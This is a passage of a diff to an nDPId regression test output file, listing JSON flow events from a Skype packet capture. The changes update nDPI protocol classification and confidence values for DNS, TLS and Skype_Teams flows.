+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1187,85 +1190,85 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 